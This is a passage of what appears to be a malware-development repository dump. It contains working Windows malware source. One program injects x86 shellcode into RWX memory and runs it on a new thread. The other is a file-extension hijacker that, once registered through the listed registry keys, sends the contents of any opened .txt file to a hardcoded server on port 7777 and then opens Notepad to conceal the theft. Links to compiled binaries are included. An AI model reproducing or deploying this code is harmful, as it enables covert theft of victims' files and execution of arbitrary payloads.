"WriteProfileStringA", "WriteProfileStringW", "WriteTapemark", "ZombifyActCtx", "ZombifyActCtxWorker", "__C_specific_handler", "__chkstk", "__misaligned_access", "_hread", "_hwrite", "_lclose", "_lcreat", "_llseek", "_local_unwind", "_lopen", "_lread", "_lwrite", "lstrcat", "lstrcatA", "lstrcatW", "lstrcmp", "lstrcmpA", "lstrcmpW", "lstrcmpi", "lstrcmpiA", "lstrcmpiW", "lstrcpy", "lstrcpyA", "lstrcpyW", "lstrcpyn", "lstrcpynA", "lstrcpynW", "lstrlen", "lstrlenA", "lstrlenW", "timeBeginPeriod", "timeEndPeriod", "timeGetDevCaps", "timeGetSystemTime", "timeGetTime", "uaw_lstrcmpW", "uaw_lstrcmpiW", "uaw_lstrlenW", "uaw_wcschr", "uaw_wcscpy", "uaw_wcsicmp", "uaw_wcslen", "uaw_wcsrchr"]} -------------------------------------------------------------------------------- /self-injection/self-injection.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char** argv) { 5 | // Define MessageBox shellcode (x86) 6 | unsigned char shellcode[] = 7 | "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" 8 | "\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" 9 | "\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" 10 | "\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" 11 | "\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01" 12 | "\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d" 13 | "\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01" 14 | "\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" 15 | "\xe8\x89\x44\x24\x1c\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89" 16 | "\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45" 17 | "\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff" 18 | "\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64" 19 | "\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56" 20 | "\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24" 21 | "\x52\xe8\x5f\xff\xff\xff\x68\x65\x58\x20\x20\x68\x6c\x63" 22 | "\x6f\x64\x68\x53\x68\x65\x6c\x31\xdb\x88\x5c\x24\x09\x89" 23 | "\xe3\x68\x6d\x58\x20\x20\x68\x76\x65\x6e\x6f\x68\x20\x6d" 24 | "\x73\x66\x68\x65\x20\x62\x79\x68\x6c\x63\x6f\x64\x68\x53" 25 | "\x68\x65\x6c\x31\xc9\x88\x4c\x24\x15\x89\xe1\x31\xd2\x52" 26 | "\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08"; 27 | // Allocate memory using VirtualAlloc 28 | LPVOID allocated_mem = VirtualAlloc(NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE); 29 | 30 | if (allocated_mem == NULL) { 31 | printf("Failed to allocate memory: %d\n", GetLastError()); 32 | return 1; 33 | } 34 | 35 | printf("Memory Allocated at address: 0x%p\n", allocated_mem); 36 | // Write shellcode to the allocated memory 37 | RtlCopyMemory(allocated_mem, shellcode, sizeof(shellcode)); 38 | 39 | printf("Shellcode is written to allocated memory!\n"); 40 | // Create thread to execute the MessageBox shellcode 41 | HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)allocated_mem, NULL, 0, NULL); 42 | 43 | if (hThread == NULL) { 44 | printf("Failed to create thread: %d\n", GetLastError()); 45 | return 1; 46 | } 47 | // Halt execution until created thread returns 48 | WaitForSingleObject(hThread, INFINITE); 49 | // Close handle to thread 50 | CloseHandle(hThread); 51 | // Free allocated memory 52 | VirtualFree(allocated_mem, 0, MEM_RELEASE); 53 | 54 | return 0; 55 | } -------------------------------------------------------------------------------- /self-injection/self-injection.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/leetCipher/Malware.development/b716460d7f7eaa113752986b34cd0a88a293bd63/self-injection/self-injection.exe -------------------------------------------------------------------------------- /txt-extension-hijacking/registry_keys.txt: -------------------------------------------------------------------------------- 1 | Windows 10: 2 | => Computer\HKEY_CLASSES_ROOT\txtfile\shell\open\command 3 | 4 | Windows 11: 5 | => Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt\UserChoiceLatest 6 | -------------------------------------------------------------------------------- /txt-extension-hijacking/txt_to_malware.cpp: -------------------------------------------------------------------------------- 1 | /* To change SubSystem to "Windows GUI" in VS.2022 => project properties => linker => system => SubSystem => Windows (/SUBSYSTEM:WINDOWS) */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #pragma comment(lib, "Ws2_32.lib") 9 | 10 | 11 | int WINAPI WinMain( 12 | _In_ HINSTANCE hInstance, 13 | _In_opt_ HINSTANCE hPrevInstance, 14 | _In_ LPSTR lpCmdLine, 15 | _In_ int nShowCmd 16 | ) { 17 | 18 | const char* server_ip = "192.168.1.2"; // Server ip address 19 | const int server_port = 7777; // Port number 20 | 21 | wchar_t file_pathW[1024]; 22 | MultiByteToWideChar(CP_ACP, 0, lpCmdLine, -1, file_pathW, 1024); 23 | 24 | wchar_t server_ipW[1024]; 25 | MultiByteToWideChar(CP_ACP, 0, server_ip, -1, server_ipW, 1024); 26 | 27 | // Initialize Winsock 28 | WSADATA wsaData; 29 | if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) { 30 | ShellExecute(NULL, TEXT("open"), TEXT("notepad.exe"), file_pathW, NULL, SW_SHOWNORMAL); 31 | ExitProcess(EXIT_FAILURE); 32 | } 33 | 34 | // Create socket 35 | SOCKET sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); 36 | if (sock == INVALID_SOCKET) { 37 | WSACleanup(); 38 | ShellExecute(NULL, TEXT("open"), TEXT("notepad.exe"), file_pathW, NULL, SW_SHOWNORMAL); 39 | ExitProcess(EXIT_FAILURE); 40 | 41 | } 42 | 43 | // Set up the sockaddr 44 | struct sockaddr_in server_addr; 45 | server_addr.sin_family = AF_INET; 46 | server_addr.sin_port = htons(server_port); 47 | if (InetPton(AF_INET, server_ipW, &server_addr.sin_addr) <= 0) { 48 | closesocket(sock); 49 | WSACleanup(); 50 | ShellExecute(NULL, TEXT("open"), TEXT("notepad.exe"), file_pathW, NULL, SW_SHOWNORMAL); 51 | ExitProcess(EXIT_FAILURE); 52 | } 53 | 54 | // Connect to the server 55 | if (connect(sock, (struct sockaddr*)&server_addr, sizeof(server_addr)) == SOCKET_ERROR) { 56 | closesocket(sock); 57 | WSACleanup(); 58 | ShellExecute(NULL, TEXT("open"), TEXT("notepad.exe"), file_pathW, NULL, SW_SHOWNORMAL); 59 | ExitProcess(EXIT_FAILURE); 60 | } 61 | 62 | // Open file 63 | HANDLE file = CreateFile(file_pathW, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 64 | if (file == INVALID_HANDLE_VALUE) { 65 | closesocket(sock); 66 | WSACleanup(); 67 | ShellExecute(NULL, TEXT("open"), TEXT("notepad.exe"), file_pathW, NULL, SW_SHOWNORMAL); 68 | ExitProcess(EXIT_FAILURE); 69 | } 70 | 71 | // Read and send file content 72 | char buffer[1024]; 73 | DWORD bytes_read; 74 | while (ReadFile(file, buffer, sizeof(buffer), &bytes_read, NULL) && bytes_read > 0) { 75 | if (send(sock, buffer, bytes_read, 0) == SOCKET_ERROR) { 76 | CloseHandle(file); 77 | closesocket(sock); 78 | WSACleanup(); 79 | ShellExecute(NULL, TEXT("open"), TEXT("notepad.exe"), file_pathW, NULL, SW_SHOWNORMAL); 80 | ExitProcess(EXIT_FAILURE); 81 | } 82 | } 83 | 84 | // Clean up 85 | CloseHandle(file); 86 | closesocket(sock); 87 | WSACleanup(); 88 | 89 | // Pass the filename to notepad and open it 90 | ShellExecute(NULL, TEXT("open"), TEXT("notepad.exe"), file_pathW, NULL, SW_SHOWNORMAL); 91 | 92 | return 0; 93 | } 94 | -------------------------------------------------------------------------------- /txt-extension-hijacking/txt_to_malware.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/leetCipher/Malware.development/b716460d7f7eaa113752986b34cd0a88a293bd63/txt-extension-hijacking/txt_to_malware.exe --------------------------------------------------------------------------------